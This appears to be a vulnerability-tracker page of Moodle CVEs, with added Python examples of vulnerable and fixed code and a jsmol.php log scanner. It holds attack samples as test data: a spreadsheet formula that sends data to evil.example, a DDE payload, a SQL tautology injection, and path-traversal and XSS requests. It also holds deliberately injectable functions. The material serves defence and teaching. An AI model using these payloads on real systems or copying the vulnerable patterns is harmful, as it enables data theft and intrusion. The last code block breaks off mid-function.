Moodle

45 CVEs

CVE-2026-30884 CRITICAL Act Now

Cross-course privilege escalation in the Moodle Mod Customcert plugin (mod_customcert) allows an authenticated teacher who holds certificate management rights in any one course to read and modify certificate data across the entire Moodle installation, because the editelement callback and the save_element web service do not verify that the element being edited belongs to a context the caller may manage. An attacker with mod/customcert:manage in a single course can disclose certificate information from other courses or tamper with their certificate elements. Plugin versions 4.4.9 and 5.0.3 contain the fix; earlier releases on those branches remain affected.

Information Disclosure Authentication Bypass Moodle Mod Customcert Moodle
NVD GitHub VulDB
CVSS 3.1
9.6
EPSS
0.0%
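The flaw above is a context-confusion bug: the capability check is made somewhere the caller is allowed, rather than where the target record lives. The following is an added example, not code from Moodle or mod_customcert, using a constructed toy model of Moodle's context tree (system, course, module), two constructed users and two constructed certificate elements; Moodle's real implementation is PHP and its context API is far richer than this.

```python
"""Added example, not code from Moodle or mod_customcert: a toy model of
Moodle's context tree showing why a write endpoint must check the capability
in the context the target record belongs to, not in a context the caller
names.  Contexts, users, grants and element records are all constructed."""

from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Context:
    id: int
    parent: Context | None = None


# Constructed site: system > course A, course B > one certificate module each.
SYSTEM = Context(1)
COURSE_A = Context(10, SYSTEM)
COURSE_B = Context(20, SYSTEM)
CERT_A = Context(11, COURSE_A)    # module context of the certificate in course A
CERT_B = Context(21, COURSE_B)    # module context of the certificate in course B
CONTEXTS = {c.id: c for c in (SYSTEM, COURSE_A, COURSE_B, CERT_A, CERT_B)}

# (user, capability) -> context ids where a role granting it is assigned.
GRANTS = {
    ("teacher_a", "mod/customcert:manage"): {COURSE_A.id},
    ("admin", "mod/customcert:manage"): {SYSTEM.id},
}

# Certificate elements; each belongs to exactly one module context.
ELEMENTS = {
    501: {"context": CERT_A, "name": "Student name", "data": "fullname"},
    601: {"context": CERT_B, "name": "Grade", "data": "final grade"},
}


def has_capability(user: str, capability: str, context: Context) -> bool:
    """Capabilities inherit down the tree: granted in a course, they hold in
    every module context beneath it.  Walk from `context` up to the root."""
    granted_in = GRANTS.get((user, capability), set())
    node: Context | None = context
    while node is not None:
        if node.id in granted_in:
            return True
        node = node.parent
    return False


def save_element_vulnerable(user: str, element_id: int, new_data: str,
                            client_context_id: int) -> bool:
    """Flawed pattern: the capability is checked in a context the client sends,
    so a teacher passes a course where they do hold the capability while the
    element id refers to a certificate in someone else's course."""
    if not has_capability(user, "mod/customcert:manage", CONTEXTS[client_context_id]):
        return False
    ELEMENTS[element_id]["data"] = new_data
    return True


def save_element_fixed(user: str, element_id: int, new_data: str) -> bool:
    """Hardened pattern: load the element, derive its context from the record,
    and require the capability there.  The client names only the element;
    there is no caller-chosen context to substitute."""
    element = ELEMENTS.get(element_id)
    if element is None:
        return False
    if not has_capability(user, "mod/customcert:manage", element["context"]):
        return False
    element["data"] = new_data
    return True
```

The same shape applies to the other insufficient-capability-check entries on this page (badge awarding, hidden grades, Feedback responses in Separate Groups mode): resolve the object first, then check in its context, and never accept a context id from the request as the thing to check against.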
CVE-2026-26047 MEDIUM PATCH This Month

Moodle's TeX formula editor fails to enforce adequate execution time limits when processing mimetex content, enabling authenticated users to craft malicious formulas that exhaust server resources. This resource exhaustion vulnerability can degrade application performance or trigger denial-of-service conditions without requiring user interaction or privilege escalation.

Moodle
NVD
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-26046 HIGH This Week

Moodle's TeX filter fails to properly sanitize administrative configuration inputs, enabling command injection on systems with ImageMagick installed. An authenticated administrator can inject arbitrary system commands through a malicious TeX filter setting, achieving code execution with the privileges of the Moodle server process. No patch is currently available, and exploitation requires administrative access but could compromise the entire Moodle installation.

Moodle Command Injection
NVD
CVSS 3.1
7.2
EPSS
0.2%
CVE-2026-26045 HIGH PATCH This Week

Moodle's backup restore function does not adequately validate the contents of uploaded backup files, allowing an authenticated user with restore privileges to achieve remote code execution through crafted file processing and fully compromise the Moodle server.

Moodle
NVD
CVSS 3.1
7.2
EPSS
0.1%
CVE-2025-67857 MEDIUM PATCH This Month

A flaw was found in Moodle. During anonymous assignment submissions, user identifiers were inadvertently exposed in URLs. [CVSS 4.3 MEDIUM]

Moodle Information Disclosure
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-67856 MEDIUM PATCH This Month

A flaw was found in Moodle. An authorization logic flaw, specifically due to incomplete role checks during the badge awarding process, allowed badges to be granted without proper verification. [CVSS 5.4 MEDIUM]

Moodle Privilege Escalation
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2025-67855 MEDIUM PATCH This Month

A flaw was found in Moodle. A remote attacker could exploit a reflected Cross-Site Scripting (XSS) vulnerability in the policy tool return URL. [CVSS 5.4 MEDIUM]

XSS Information Disclosure Moodle
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2025-67853 HIGH PATCH This Week

A flaw was found in Moodle. A remote attacker could exploit a lack of proper rate limiting in the confirmation email service. [CVSS 7.5 HIGH]

Moodle
NVD
CVSS 3.1
7.5
EPSS
0.0%
CVE-2025-67852 LOW PATCH Monitor

A flaw was found in Moodle. An open redirect vulnerability in the OAuth login flow allows a remote attacker to redirect users to attacker-controlled pages after they have successfully authenticated. [CVSS 3.5 LOW]

Moodle Information Disclosure Open Redirect
NVD
CVSS 3.1
3.5
EPSS
0.0%
CVE-2025-67851 MEDIUM PATCH This Month

A flaw was found in Moodle. A formula (CSV) injection vulnerability occurs when data fields are exported without proper escaping, so a cell beginning with a character such as = or @ is evaluated as a formula when the export is opened in a spreadsheet. [CVSS 6.1 MEDIUM]

Moodle
NVD
CVSS 3.1
6.1
EPSS
0.0%
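Formula injection is neutralised at export time, not by CSV quoting. The following is an added example, not Moodle's export code: a CSV writer with and without cell escaping, run over constructed rows in which one student-controlled field carries a spreadsheet formula. The rule it encodes (leave genuine numbers alone, prefix other trigger-leading cells with an apostrophe) is the common mitigation; which characters trigger evaluation is spreadsheet-specific, so the trigger list is a practical default rather than a guarantee.

```python
"""Added example, not Moodle's export code: a CSV export with and without
neutralisation of cells that a spreadsheet would evaluate as a formula.
The rows are constructed; the dangerous cell imitates a value a student
could type into a free-text profile field."""

import csv
import io
import re

# Leading characters Excel, LibreOffice and Google Sheets treat as the start of
# a formula, plus the control characters that let a value escape its cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")
NUMBER_RE = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def escape_cell(value: object) -> str:
    """Return the cell text a spreadsheet will display literally.  Genuine
    numbers (including negatives) pass through so numeric columns still
    add up; any other value beginning with a trigger character gets a
    leading apostrophe, which spreadsheets read as 'treat as text'.
    Embedded tab/CR/LF are flattened so a cell cannot span rows."""
    text = "" if value is None else str(value)
    if NUMBER_RE.match(text):
        return text
    dangerous = text.startswith(FORMULA_TRIGGERS)
    text = text.replace("\r", " ").replace("\n", " ").replace("\t", " ")
    return "'" + text if dangerous else text


def export_vulnerable(rows) -> str:
    """Writes values as-is: correct CSV quoting, but quoting only protects the
    file format, not the spreadsheet that later evaluates the cell."""
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()


def export_fixed(rows) -> str:
    """Same writer, every cell passed through escape_cell first."""
    buf = io.StringIO()
    csv.writer(buf).writerows([[escape_cell(cell) for cell in row] for row in rows])
    return buf.getvalue()


# Constructed export: a profile field filled in by students.
SAMPLE_ROWS = [
    ["id", "name", "city", "score"],
    [7, "Ada", '=HYPERLINK("https://evil.example/?c="&A1,"open")', -3.5],
    [8, "Bob", "@SUM(1+1)*cmd|' /C calc'!A0", 12],
    [9, "Cy", "Oslo", 0],
]
```

Note the trade-off in escape_cell: a blanket rule of prefixing every cell that starts with `-` would corrupt negative numbers in grade exports, which is why numeric-looking values are recognised first and passed through unchanged.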
CVE-2025-67850 HIGH PATCH This Week

A flaw was found in Moodle. This cross-site scripting (XSS) vulnerability occurs due to insufficient checks on user-provided data in the formula editor's arithmetic expression fields. [CVSS 7.3 HIGH]

Moodle XSS
NVD
CVSS 3.1
7.3
EPSS
0.0%
CVE-2025-67849 HIGH PATCH This Week

A flaw was found in Moodle. This cross-site scripting (XSS) vulnerability, caused by improper sanitization of AI prompt responses, allows attackers to inject malicious HTML or script into web pages. [CVSS 7.3 HIGH]

Moodle XSS AI / ML
NVD
CVSS 3.1
7.3
EPSS
0.0%
CVE-2025-67848 HIGH PATCH This Week

An authentication weakness in Moodle's Learning Tools Interoperability (LTI) provider allows attackers to authenticate to the site through the LTI provider. [CVSS 8.1 HIGH]

Moodle Authentication Bypass Information Disclosure
NVD
CVSS 3.1
8.1
EPSS
0.1%
CVE-2025-67847 HIGH PATCH This Week

A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. [CVSS 8.8 HIGH]

Moodle
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2021-47857 HIGH POC This Week

Moodle 3.10.3 contains a persistent cross-site scripting vulnerability in the calendar event subtitle field that allows attackers to inject malicious scripts. [CVSS 7.2 HIGH]

Moodle XSS
NVD Exploit-DB
CVSS 3.1
7.2
EPSS
0.0%
CVE-2025-53021 MEDIUM PATCH This Month

A session fixation vulnerability in Moodle 3.x through 3.11.18 allows unauthenticated attackers to hijack user sessions via the sesskey parameter. The sesskey can be obtained without authentication and reused within the OAuth2 login flow, resulting in the victim's session being linked to the attacker's. Successful exploitation results in full account takeover. According to the Moodle Releases page, "Bug fixes for security issues in 3.11.x ended 11 December 2023." NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Information Disclosure Ubuntu Debian Moodle
NVD GitHub
CVSS 3.1
4.2
EPSS
0.2%
CVE-2025-34032 MEDIUM POC This Month

A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-02 UTC.

PHP XSS Jmol Moodle
NVD Exploit-DB
CVSS 3.1
6.1
EPSS
0.1%
CVE-2025-34031 HIGH POC THREAT Act Now

The Moodle LMS Jmol plugin version 6.1 and earlier contains a path traversal vulnerability in jsmol.php. The query parameter is passed directly to file_get_contents() without validation, allowing unauthenticated attackers to read arbitrary files from the Moodle server including configuration files with database credentials.

PHP Path Traversal Moodle Information Disclosure Jmol
NVD Exploit-DB
CVSS 3.1
7.5
EPSS
12.2%
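The two Jmol entries above share one endpoint, jsmol.php, and both are reachable without authentication, which makes them good candidates for retrospective log review. The following is an added example, not part of either advisory or of the plugin: a scanner over constructed Apache-style access log lines that flags traversal payloads in the `query` parameter (CVE-2025-34031) and script payloads in the `data` parameter (CVE-2025-34032), decoding nested percent-encoding first. The location of jsmol.php under /filter/jmol/ is an assumption about the plugin's install path.

```python
"""Added example, not part of the advisories or the Jmol plugin: scan web
server access logs for abuse of jsmol.php, covering the path-traversal
`query` parameter (CVE-2025-34031) and the reflected-XSS `data` parameter
(CVE-2025-34032).  Log lines are constructed; the /filter/jmol/ path is an
assumption about where the plugin is installed."""

import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Traversal, absolute paths, stream wrappers and direct requests for config.php
# (the file the advisory says leaks database credentials).
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|^/|^[a-z]+://|php://|config\.php)", re.I)
XSS_RE = re.compile(r"(<\s*script|javascript:|on\w+\s*=|<\s*svg|<\s*img)", re.I)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (%252e%252e%252f -> ../)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str):
    """Return a finding dict for a suspicious jsmol.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/jsmol.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for q in params.get("query", []):
        decoded = fully_decode(q)
        if TRAVERSAL_RE.search(decoded):
            findings.append(("CVE-2025-34031", "query", decoded))
    for d in params.get("data", []):
        decoded = fully_decode(d)
        if XSS_RE.search(decoded):
            findings.append(("CVE-2025-34032", "data", decoded))
    if not findings:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": m.group("status"), "findings": findings}


def scan(lines):
    return [hit for hit in (scan_line(line) for line in lines) if hit]


# Constructed log excerpt: two traversal attempts (one double-encoded), one
# XSS probe, one legitimate molecule load, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.9 - - [02/Feb/2025:10:01:07 +0000] "GET /moodle/filter/jmol/jsmol.php?query=../../../../config.php HTTP/1.1" 200 1843',
    '203.0.113.9 - - [02/Feb/2025:10:01:09 +0000] "GET /moodle/filter/jmol/jsmol.php?query=..%252f..%252fconfig.php HTTP/1.1" 200 1843',
    '198.51.100.4 - - [02/Feb/2025:10:03:44 +0000] "GET /moodle/filter/jmol/jsmol.php?data=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.77 - - [02/Feb/2025:10:05:00 +0000] "GET /moodle/filter/jmol/jsmol.php?query=caffeine.mol HTTP/1.1" 200 9021',
    '192.0.2.78 - - [02/Feb/2025:10:05:02 +0000] "GET /moodle/course/view.php?id=3 HTTP/1.1" 200 30211',
]
```

A 200 status on a traversal hit for config.php is the line to treat as a credential exposure: rotate the database password and inspect for follow-on access, since the file read needs no session and leaves no trace in Moodle's own logs.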
CVE-2025-4513 MEDIUM This Month

An open redirect vulnerability, classified as problematic, was found in the Catalyst User Key Authentication plugin (version 20220819) for Moodle. Rated medium severity (CVSS 5.3), it is remotely exploitable with low attack complexity and requires no authentication. No vendor patch available.

Open Redirect PHP Moodle
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.2%
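Both open redirect entries on this page (CVE-2025-67852 in the core OAuth login flow and CVE-2025-4513 in the Catalyst User Key Authentication plugin) sit at the same point: a return URL carried through an authentication flow and followed once login succeeds. The following is an added example, not Moodle or plugin code, of a validator for such a parameter; the parameter name wantsurl is Moodle's, while the site URL and the accepted and rejected inputs are constructed.

```python
"""Added example, not Moodle or plugin code: validating a post-login return
URL so an authentication flow can only send the browser back into the site.
The parameter name wantsurl is Moodle's; the site URL and the inputs are
constructed for the example."""

from __future__ import annotations

from urllib.parse import urlsplit, urlunsplit

SITE_URL = "https://lms.example.edu/moodle"   # stands in for $CFG->wwwroot


def safe_return_url(wantsurl: str | None, site_url: str = SITE_URL) -> str:
    """Return wantsurl if it resolves to a page under site_url, otherwise the
    site front page.  Rejected: empty values, control characters and
    backslashes (browsers read '/\\host' as '//host'), scheme-relative
    '//host', any scheme other than the site's, any other host (including
    'site@evil' userinfo tricks and 'site.evil' suffixes), and same-host
    paths outside the site's base path.  The fragment is always dropped."""
    base = site_url.rstrip("/")
    fallback = base + "/"
    if not wantsurl or any(ord(ch) < 0x20 or ch == "\\" for ch in wantsurl):
        return fallback
    site = urlsplit(site_url)
    parts = urlsplit(wantsurl)
    if parts.scheme == "" and parts.netloc == "":
        # Path-only value.  urlsplit has already moved a leading '//host' into
        # netloc, so a path that still starts with '//' is malformed: reject.
        if not parts.path.startswith("/") or parts.path.startswith("//"):
            return fallback
        rebuilt = urlunsplit((site.scheme, site.netloc, parts.path, parts.query, ""))
    elif (parts.scheme.lower() == site.scheme.lower()
          and parts.netloc.lower() == site.netloc.lower()):
        # Absolute URL on our own host: rebuild from the trusted scheme/host so
        # odd casing or encoding in the input never reaches the Location header.
        rebuilt = urlunsplit((site.scheme, site.netloc, parts.path or "/", parts.query, ""))
    else:
        return fallback
    if rebuilt != base and not rebuilt.startswith(fallback):
        return fallback
    return rebuilt
```

The rebuild step matters more than the checks: the value that ends up in the redirect is assembled from the configured scheme and host, so even a bypass of one of the string tests cannot point the browser at another origin.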
CVE-2025-3647 MEDIUM PATCH This Month

A flaw was discovered in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
4.3
EPSS
0.3%
CVE-2025-3645 MEDIUM PATCH This Month

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
4.3
EPSS
0.3%
CVE-2025-3644 MEDIUM PATCH This Month

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
4.3
EPSS
0.3%
CVE-2025-3643 MEDIUM PATCH This Month

A flaw was found in Moodle. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity.

XSS Moodle
NVD
CVSS 3.1
5.4
EPSS
0.2%
CVE-2025-3642 HIGH PATCH This Week

A flaw was found in Moodle. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity.

RCE Code Injection Moodle
NVD
CVSS 3.1
8.8
EPSS
1.4%
CVE-2025-3641 HIGH PATCH This Week

A flaw was found in Moodle. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity.

RCE Code Injection Moodle
NVD
CVSS 3.1
8.8
EPSS
1.4%
CVE-2025-3640 MEDIUM PATCH This Month

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
4.3
EPSS
0.3%
CVE-2025-3638 HIGH PATCH This Week

A flaw was found in Moodle. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

CSRF Moodle
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2025-3637 LOW PATCH Monitor

A security vulnerability was found in Moodle where the session key that protects against cross-site request forgery (CSRF) was exposed in the site's URL, from where it can leak through Referer headers, browser history and server logs. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable.

CSRF Moodle
NVD
CVSS 3.1
3.1
EPSS
0.2%
CVE-2025-3636 MEDIUM PATCH This Month

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
4.3
EPSS
0.2%
CVE-2025-3635 LOW PATCH Monitor

A security vulnerability was discovered in Moodle that allows anyone to duplicate existing user tours without logging in, due to a missing cross-site request forgery (CSRF) check. Rated low severity (CVSS 3.5), this vulnerability is remotely exploitable, low attack complexity.

CSRF Moodle
NVD
CVSS 3.1
3.5
EPSS
0.1%
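Three entries on this page concern Moodle's anti-CSRF session key, sesskey: CVE-2025-3638 and CVE-2025-3635 are missing checks, CVE-2025-3637 is the key leaking in a URL, and CVE-2025-53021 higher up describes a pre-authentication sesskey being carried into the OAuth2 login so that the victim ends up bound to the attacker's session. The following is an added example, not Moodle's session code, of the two controls that close all four: verify the token only from a POST body in constant time, and rotate both the session id and the sesskey when the session changes privilege. The store, request shape and user names are constructed.

```python
"""Added example, not Moodle's session code: a minimal session store showing
the two controls behind the CSRF and session-fixation entries on this page.
The per-session anti-CSRF token is named sesskey as in Moodle; the store,
request shape and user names are constructed."""

from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass


@dataclass
class Session:
    sid: str
    sesskey: str
    user: str | None = None


class SessionStore:
    def __init__(self) -> None:
        self._sessions: dict[str, Session] = {}

    def start(self) -> Session:
        """Anonymous session with its own sesskey.  Guests get one too, which is
        why a sesskey obtained before login must never be treated as a proof
        of anything about the user who later logs in."""
        s = Session(secrets.token_urlsafe(32), secrets.token_urlsafe(24))
        self._sessions[s.sid] = s
        return s

    def login(self, sid: str, user: str) -> Session:
        """Privilege change: rotate BOTH identifiers.  A sid or sesskey the
        attacker learned (or planted) before authentication no longer refers
        to the victim's authenticated session, so fixation cannot carry over."""
        self._sessions.pop(sid)
        fresh = Session(secrets.token_urlsafe(32), secrets.token_urlsafe(24), user)
        self._sessions[fresh.sid] = fresh
        return fresh

    def get(self, sid: str) -> Session | None:
        return self._sessions.get(sid)


def require_sesskey(store: SessionStore, request: dict) -> bool:
    """State-changing requests must be POST and carry the token in the body.
    A token in the query string is refused even when correct, because a URL
    leaks through Referer headers, history, proxies and logs (the CVE-2025-3637
    failure mode).  The comparison is constant-time."""
    session = store.get(request.get("cookie_sid", ""))
    if session is None or request.get("method") != "POST":
        return False
    submitted = request.get("form", {}).get("sesskey")
    if not isinstance(submitted, str):
        return False
    return hmac.compare_digest(submitted, session.sesskey)
```

Duplicating a user tour, awarding a badge or restoring a backup are all state changes; each handler calls the equivalent of require_sesskey before touching anything, and a GET that would change state is a bug regardless of whether it carries a token.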
CVE-2025-3628 MEDIUM PATCH This Month

A flaw was found in Moodle where anonymous assignment submissions can be de-anonymized via search, revealing student identities. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Information Disclosure Moodle
NVD
CVSS 3.1
4.3
EPSS
0.4%
CVE-2025-3627 MEDIUM PATCH This Month

A security vulnerability was discovered in Moodle that allows some users to access sensitive information about other students before they have finished verifying their identity with two-factor authentication. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
4.3
EPSS
0.2%
CVE-2025-3625 HIGH This Week

A security vulnerability was discovered in Moodle that can allow attackers to gain access to sensitive information about students and to prevent them from logging into their accounts. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Authentication Bypass Moodle
NVD
CVSS 3.1
7.1
EPSS
0.3%
CVE-2025-32045 MEDIUM PATCH This Month

A flaw has been identified in Moodle where insufficient capability checks in certain grade reports allowed users without the necessary permissions to access hidden grades. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
5.3
EPSS
0.5%
CVE-2025-32044 HIGH PATCH This Week

A flaw has been identified in Moodle where, on certain sites, unauthenticated users could retrieve sensitive user data, including names, contact information and hashed passwords, via stack traces. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Information Disclosure PHP Moodle
NVD
CVSS 3.1
7.5
EPSS
0.6%
CVE-2025-3634 MEDIUM PATCH This Month

A security vulnerability was discovered in Moodle that allows students to enrol themselves in courses without all of the required checks being completed. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

Authentication Bypass Moodle
NVD
CVSS 3.1
4.3
EPSS
0.3%
CVE-2025-26533 HIGH PATCH This Week

An SQL injection risk was identified in the module list filter within course search. Rated high severity (CVSS 8.1), this vulnerability is remotely exploitable, no authentication required.

SQLi Moodle
NVD
CVSS 3.1
8.1
EPSS
0.3%
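A "module list filter" is the shape of input that most often ends up string-built into an `IN (...)` clause, because a list does not fit a single placeholder. The following is an added example, not Moodle's code: the injectable form beside the parameterised form, run against an in-memory SQLite table of constructed course modules. Moodle's own DML layer provides $DB->get_in_or_equal() for exactly this; the in_or_equal helper below mirrors that idea in Python.

```python
"""Added example, not Moodle's code: the pattern behind an injectable list
filter and its parameterised form, run against an in-memory SQLite table of
constructed course modules.  Moodle's DML layer offers $DB->get_in_or_equal()
for this case; in_or_equal() below mirrors that idea."""

from __future__ import annotations

import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed table: course 3 has a forum, a quiz and a hidden assignment;
    course 4 has one quiz.  A correct filter for course 3 never returns the
    hidden assignment or anything from course 4."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE course_modules (id INTEGER, course INTEGER, modname TEXT, visible INTEGER)")
    con.executemany("INSERT INTO course_modules VALUES (?, ?, ?, ?)", [
        (1, 3, "forum", 1), (2, 3, "quiz", 1), (3, 3, "assign", 0), (4, 4, "quiz", 1),
    ])
    return con


def visible_modules_vulnerable(con: sqlite3.Connection, course: int, modnames: list[str]) -> list[tuple]:
    """String-builds the IN list from user-chosen module names.  One quote in
    a name ends the string literal and the rest of the value becomes SQL."""
    in_list = ", ".join(f"'{name}'" for name in modnames)
    sql = (f"SELECT id, modname FROM course_modules "
           f"WHERE course = {course} AND visible = 1 AND modname IN ({in_list})")
    return con.execute(sql).fetchall()


def in_or_equal(values: list) -> tuple[str, list]:
    """Build 'IN (?, ?, ...)' with one placeholder per value and return the
    fragment with its parameter list.  An empty list is rejected rather than
    emitting 'IN ()', which is a syntax error on most databases."""
    if not values:
        raise ValueError("empty IN list")
    return "IN (" + ", ".join("?" for _ in values) + ")", list(values)


def visible_modules_fixed(con: sqlite3.Connection, course: int, modnames: list[str]) -> list[tuple]:
    """Every user value travels as a bound parameter; the SQL text is constant
    apart from the number of placeholders."""
    in_sql, params = in_or_equal(modnames)
    sql = (f"SELECT id, modname FROM course_modules "
           f"WHERE course = ? AND visible = 1 AND modname {in_sql}")
    return con.execute(sql, [course, *params]).fetchall()


# Constructed attacker input: a "module name" that closes the IN list and
# appends a tautology, turning the filter into SELECT everything.
PAYLOAD = ["forum", "x') OR ('1'='1"]
```

Against the constructed table, the vulnerable query with PAYLOAD returns all four rows, including the hidden assignment and the other course's quiz; the parameterised query returns only the visible forum in course 3, because the payload is compared as a literal module name.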
CVE-2025-26532 LOW PATCH Monitor

Additional checks were required to ensure trusttext is applied (when enabled) to glossary entries being restored. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable. This Incorrect Authorization vulnerability could allow attackers to bypass authorization checks to access restricted resources.

Authentication Bypass Moodle
NVD
CVSS 3.1
3.1
EPSS
0.1%
CVE-2025-26531 LOW PATCH Monitor

Insufficient capability checks made it possible to disable badges a user does not have permission to access. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable, no authentication required. This Incorrect Authorization vulnerability could allow attackers to bypass authorization checks to access restricted resources.

Authentication Bypass Moodle
NVD
CVSS 3.1
3.1
EPSS
0.2%
CVE-2025-26530 HIGH PATCH This Week

The question bank filter required additional sanitizing to prevent a reflected XSS risk. Rated high severity (CVSS 8.3), this vulnerability is remotely exploitable, no authentication required. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Moodle
NVD
CVSS 3.1
8.3
EPSS
0.3%
CVE-2025-26529 HIGH PATCH This Week

Description information displayed in the site administration live log required additional sanitizing to prevent a stored XSS risk. Rated high severity (CVSS 8.3), this vulnerability is remotely exploitable, no authentication required. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Moodle
NVD
CVSS 3.1
8.3
EPSS
0.2%
CVE-2025-26528 LOW PATCH Monitor

The drag-and-drop onto image (ddimageortext) question type required additional sanitizing to prevent a stored XSS risk. Rated low severity (CVSS 3.4), this vulnerability is remotely exploitable, no authentication required. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Moodle
NVD
CVSS 3.1
3.4
EPSS
0.3%
CVE-2025-26527 MEDIUM PATCH This Month

Tags not expected to be visible to a user could still be discovered by them via the tag search page or in the tags block. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Information Disclosure Moodle
NVD
CVSS 3.1
5.3
EPSS
0.2%
CVE-2025-26526 MEDIUM PATCH This Month

Separate Groups mode restrictions were not factored into permission checks before allowing viewing or deletion of responses in Feedback activities. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Incorrect Authorization vulnerability could allow attackers to bypass authorization checks to access restricted resources.

Authentication Bypass Moodle
NVD
CVSS 3.1
6.5
EPSS
0.2%
CVE-2025-26525 HIGH PATCH This Week

Insufficient sanitizing in the TeX notation filter resulted in an arbitrary file read risk on sites where pdfTeX is available (such as those with TeX Live installed). Rated high severity (CVSS 8.6), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Information Disclosure Path Traversal Moodle
NVD
CVSS 3.1
8.6
EPSS
0.3%
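Three entries on this page come from the same place, Moodle handing user or administrator input to an external TeX or image renderer: CVE-2026-26047 (no time limit on mimetex), CVE-2026-26046 (an admin-controlled TeX filter setting reaching a shell on hosts with ImageMagick), and CVE-2025-26525 (pdfTeX reading arbitrary files). The following is an added example, not Moodle's filter code, of a wrapper that applies the three controls those entries call for: an argv list with no shell so separators in a setting are literal arguments, a hard timeout, and a pdfTeX environment that refuses reads outside the job directory and disables \write18. The binary paths are illustrative; the wrapper is exercised with the Python interpreter standing in for a renderer, and kpathsea's behaviour of letting environment variables override texmf.cnf entries of the same name is relied on for openin_any and shell_escape.

```python
"""Added example, not Moodle's filter code: a hardened wrapper for invoking an
external TeX/image renderer (pdflatex, convert, mimetex) with no shell
interpretation of admin-supplied settings, a hard execution time limit, and
pdfTeX told to refuse reading outside the job directory.  Binary paths are
illustrative; the demo uses the Python interpreter as a stand-in renderer."""

from __future__ import annotations

import shlex
import subprocess
import sys
from dataclasses import dataclass

# Binaries an admin setting may name; anything else is rejected before exec.
# sys.executable is included only so the demo below can run without TeX.
ALLOWED_BINARIES = {"/usr/bin/pdflatex", "/usr/bin/convert", "/usr/bin/mimetex", sys.executable}


@dataclass
class RenderResult:
    ok: bool
    timed_out: bool
    returncode: int | None
    error: str


def build_argv(setting: str, extra_args: list[str]) -> list[str]:
    """Turn an admin-entered command setting into an argv list.  shlex.split
    does POSIX word splitting without a shell, so ';', '|', '$(...)' and
    backticks in the setting become literal arguments, not command syntax.
    The first word must be an allow-listed binary."""
    words = shlex.split(setting)
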